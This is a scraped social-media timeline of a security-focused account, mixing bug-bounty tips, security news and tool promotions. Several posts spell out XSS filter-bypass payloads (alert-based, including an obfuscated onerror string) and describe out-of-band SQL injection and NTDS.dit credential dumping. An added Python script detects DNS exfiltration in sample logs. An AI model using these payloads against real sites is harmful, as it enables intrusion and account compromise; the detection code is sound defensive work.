EdiAcoo (@AcooEdi)
Followers: 1K | Following: 3K | Media: 65K | Statuses: 108K
high level of job #Security #websitesecurity #dataprotection #privacy #hacker #malware #Pentesting #Infosec #Tech #Technology
Canadá
Joined June 2018
HTML Sanitizer Bypass Cloudflare leads to XSS payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
3
40
328
It is an advanced web vulnerability analysis tool designed to help cybersecurity professionals and pentesters detect, assess and mitigate risks in web applications. Its goal is to strengthen the security of systems before they can be
0
47
248
XSS WAF Bypass — Multi-character HTML Entities This technique uses multi-character HTML entities that are recognized by the browser… More details about this technique are shared in our WhatsApp channel. Channel: https://t.co/KMq9swf9b5
#bugbountytip #BugBounty #XSS #WAF
1
22
134
💥 XSS via MathML? A simple <style><!-- inside MathML triggers a full DOM-based XSS due to parser confusion. 🧠 Not your usual input sanitization failure. 👇 More weird real-world exploits on our WhatsApp channel: https://t.co/KMq9swfH0D
#XSS #BugBounty
0
17
131
Another XSS Payload: {document.body.setAttribute('contenteditable',true)}document.execCommand('insert'+'HTML',false,'<img/'+'src/'+'o'+'nerror=a'+'lert('+'/catfather/)>') #bugbountytips #xss
I was writing a "Security in JavaScript" book, in which I explained how you can make an advanced XSS payload like this one: [...{[Symbol.iterator]:\u0061lert.bind(null,'catfather')}] #BugBounty #xss #bugbountytips
0
14
106
Out-of-Band SQLi isn’t your typical injection. Instead of leaking data in HTTP responses, it exfiltrates via DNS/HTTP requests. Tools like Burp Collaborator help detect it. Think xp_dirtree in MSSQL or LOAD_FILE() in MySQL. Silent… but deadly. 💉 #BugBounty
0
16
94
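The post above describes out-of-band SQL injection leaking data through DNS lookups rather than HTTP responses. From the defender's side, that traffic is visible in resolver logs. The following is an added example, not code from the post or from the tools it names: a small Python detector that runs two complementary heuristics over constructed resolver log lines. The log format, the client addresses and the domain collab-placeholder.test are all constructed stand-ins; the assumption that the last two labels form the registrable domain is a simplification for this example.

```python
import math
import re
from collections import Counter, namedtuple

# Constructed sample DNS resolver query log (not from the original page):
# "<timestamp> <client-ip> <qname> <qtype>", one query per line.
SAMPLE_LOG = """\
2025-08-12T10:00:01Z 10.0.0.5 www.example.com A
2025-08-12T10:00:02Z 10.0.0.5 mail.example.com MX
2025-08-12T10:00:03Z 10.0.0.7 41646d696e2d50617373.6a6f686e.collab-placeholder.test A
2025-08-12T10:00:04Z 10.0.0.7 MSSQL-VERSION-15-0-2000.collab-placeholder.test A
2025-08-12T10:00:05Z 10.0.0.7 3.6a6f686e.collab-placeholder.test A
2025-08-12T10:00:06Z 10.0.0.9 cdn.static.example.net AAAA
"""

Query = namedtuple("Query", "ts client qname qtype")
Flag = namedtuple("Flag", "client qname reasons")

# A label made only of hex digits and at least 16 characters long looks like
# hex-encoded bytes carried in the name rather than a hostname.
HEX_LABEL = re.compile(r"^[0-9a-fA-F]{16,}$")


def parse_log(text):
    """Parse the whitespace-separated log format above into Query tuples."""
    queries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        queries.append(Query(*parts))
    return queries


def registrable_domain(qname):
    """Assumption for this example: the last two labels are the registrable domain.
    Returns (domain, host_labels) with host_labels being everything left of it."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), labels[:-2]


def shannon_entropy(s):
    """Bits per character; encoded data scores higher than ordinary hostnames."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def suspicious_reasons(qname, max_label=20, max_qname=50, min_entropy=3.5):
    """Per-query heuristic: reasons a single name looks like it carries data."""
    reasons = set()
    _, host_labels = registrable_domain(qname)
    if len(qname) > max_qname:
        reasons.add("long qname")
    for label in host_labels:
        if len(label) > max_label:
            reasons.add("long label")
        if HEX_LABEL.match(label):
            reasons.add("hex-encoded label")
    joined = "".join(host_labels)
    if joined and shannon_entropy(joined) > min_entropy:
        reasons.add("high entropy")
    return sorted(reasons)


def scan_log(text):
    """Flag every query whose name trips at least one per-query heuristic."""
    flags = []
    for q in parse_log(text):
        reasons = suspicious_reasons(q.qname)
        if reasons:
            flags.append(Flag(q.client, q.qname, reasons))
    return flags


def burst_unique_subdomains(queries, threshold):
    """Per-(client, domain) heuristic: many distinct subdomains under one domain
    from one client is the shape of exfiltration even when each name looks benign.
    Returns {(client, domain): unique_subdomain_count} for counts >= threshold."""
    seen = {}
    for q in queries:
        domain, host_labels = registrable_domain(q.qname)
        if host_labels:
            seen.setdefault((q.client, domain), set()).add(".".join(host_labels))
    return {k: len(v) for k, v in seen.items() if len(v) >= threshold}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.client} {f.qname}: {', '.join(f.reasons)}")
    print(burst_unique_subdomains(parse_log(SAMPLE_LOG), threshold=3))
```

The two heuristics are deliberately independent: the third query from 10.0.0.7 is short and low-entropy, so the per-name check does not flag it, but the burst check still counts it because it is yet another unique subdomain under the same domain from the same client. In production the thresholds need tuning against an allowlist of known high-cardinality domains (CDNs, telemetry, anti-spam lookups), which is the usual source of false positives for this kind of rule.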
I've just added a new PR to impacket to add to secretsdump the "Shadow Snapshot Method via WMI" also for NTDS.dit. This way, NTDS.dit can be downloaded directly from disk without code execution. https://t.co/zJDl7r7xhJ
github.com
NTDS.dit Dumping with Shadow Snapshot Method via WMI (No Code Execution) This method is essentially the same as the one implemented in #1719 but also for NTDS.dit. This PR adds a new flag, -use-remot...
0
53
151
Security updates for August 2025 are now available! Details are here: https://t.co/WW89TchdN8
#PatchTuesday #SecurityUpdateGuide
2
24
42
🚨 How #Rhadamanthys Stealer Slips Past Defenses using ClickFix ⚠️ Rhadamanthys is now delivered via ClickFix, combining technical methods and social engineering to bypass automated security solutions, making detection and response especially challenging. 👾 While earlier
5
50
131
OK, some extra... https://t.co/UtYkzmaOEA
After the publication of this blog, featuring how threat actors are looking for alternatives to EV certificates to bypass SmartScreen using weaponized ClickOnce applications, it has been observed how another unrelated campaign of malware has implemented the same method. The
0
2
6
The only MCP server you'll ever need! MindsDB lets you query data from 200+ sources, like Slack, Gmail, social platforms, and more, in both SQL and natural language. A federated query engine that comes with a built-in MCP server. 100% open-source with 35k+ stars!
7
72
379
Pre-release! Airspace Visualizer is now on GitHub — ADS-B + VDL2 + AI assistant. - Linux (Windows w/minor tweaks) - Real-time aircraft display - Semantic RAG + chat - Geospatial overlays - Built for local data feeds 🔗 https://t.co/ETouuuI8ZX Early, rough, and ready for you
16
67
417
🎇 Website now has 7k active users, up another 3k from 4 days ago! 💥 added a link on the desktop for sponsorship opportunities for those who may be interested 💥 also a link to my resume as I am still actively looking for employment Last night I worked on some optimization
12
21
128
WinRAR Zero-Day Under Active Exploitation – Update to Latest Version Immediately
thehackernews.com
WinRAR 7.13 fixes CVE-2025-8088 zero-day exploited in attacks on Russian firms, linked to Paper Werewolf.
0
26
86
Yay, I can tell that MSRC just patched another infrastructure wide ATO bug that I reported against Azure FD a month ago. The main Azure error page now has an updated format to remove the domain name from the error message, thus removing a stored XSS via HTTP/2 & HTTP/1 desync.
2
2
63
Intent is crucial in every project. That's why my architecture uses a feature structure approach. Traditional code organization focuses on technical patterns: - Commands - Queries - Events This creates a significant problem: the codebase doesn't reveal what the application actually
6
41
236
🚩 Malicious Go & npm Packages Deliver Cross-Platform Malware and Trigger Remote Data Wipes https://t.co/EufsJNTR1J A recent campaign has unveiled 11 Go packages and 2 npm packages containing malicious post-install behavior. These packages silently launch shells, fetch
thehackernews.com
Attackers used 11 Go and 2 npm packages to spread malware across platforms, putting open-source developers at risk.
0
8
15
~Password reset payload list Don't forget to check out the new video! https://t.co/aLZlkXAHfK
#BugBounty
0
47
229